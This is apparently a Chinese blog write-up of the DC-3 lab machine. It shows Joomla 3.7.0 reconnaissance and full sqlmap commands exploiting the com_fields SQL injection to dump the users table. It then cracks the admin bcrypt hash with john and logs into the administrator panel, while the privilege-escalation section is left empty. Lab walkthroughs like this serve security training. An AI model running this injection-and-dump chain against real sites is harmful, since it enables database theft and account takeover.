Dc-3学习记录

一、信息收集

192.168.209.152

在这里插入图片描述

在这里插入图片描述

1、Joomla内容管理系统

下载joomscan工具
https://www.geeksforgeeks.org/joomscan-vulnerability-scanner-tool-in-kali-linux/
https://github.com/joomla/joomla-cms

This time, there is only one flag, one entry point and no clues.

To get the flag, you'll obviously have to gain root privileges.

How you get to be root is up to you - and, obviously, the system.

Good luck - and I hope you enjoy this little challenge.

在这里插入图片描述

joomscan --url http://192.168.209.152

在这里插入图片描述

发现了版本号,文件目录
http://192.168.209.152/administrator/

二、漏洞挖掘

1、版本号

searchsploit joomla 3.7.0

在这里插入图片描述
我们看到了这个版本存在sql注入漏洞。我们可以看一下漏洞的路径(一直文件名为42033)

searchsploit -p 42033 

在这里插入图片描述
我们查看一下他的这个文件

cat /usr/share/exploitdb/exploits/php/webapps/42033.txt

在这里插入图片描述

在这里插入图片描述

三、漏洞利用

1、sql注入

在这里插入图片描述
我们复制粘贴sql注入命令,注意修改url为靶机Ip

sqlmap -u "http://192.168.209.152/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

在这里插入图片描述

我们可以看到后台数据库

(1)、爆库

在这里插入图片描述
我们想要的数据库为joomladb,所以接下来我们可以使用joomla数据库,看一看它里面的表格

(2)、爆表

sqlmap -u "http://192.168.209.152/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] -D joomladb --tables 

在这里插入图片描述
我们可以看到有76个tables
在这里插入图片描述

在这里插入图片描述
其中的users表是我们需要的

(3)、爆字段名

sqlmap -u "http://192.168.209.152/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] -D joomladb -T "#__users" --columns

在这里插入图片描述

(4)、爆数据

sqlmap -u "http://192.168.209.152/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] -D joomladb -T "#__users" -C name,password --dump

在这里插入图片描述

在这里插入图片描述

(5)、破解密码

密码被加密了

$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu
echo '$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu' > test
john test
john test --show

在这里插入图片描述
密码为snoopy
登陆后台:
用户:admin
密码:snoopy
用户页面http://192.168.209.152/administrator/
在这里插入图片描述

四、提权

写在末尾的话:
sudo apt update
apt install xxxx

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值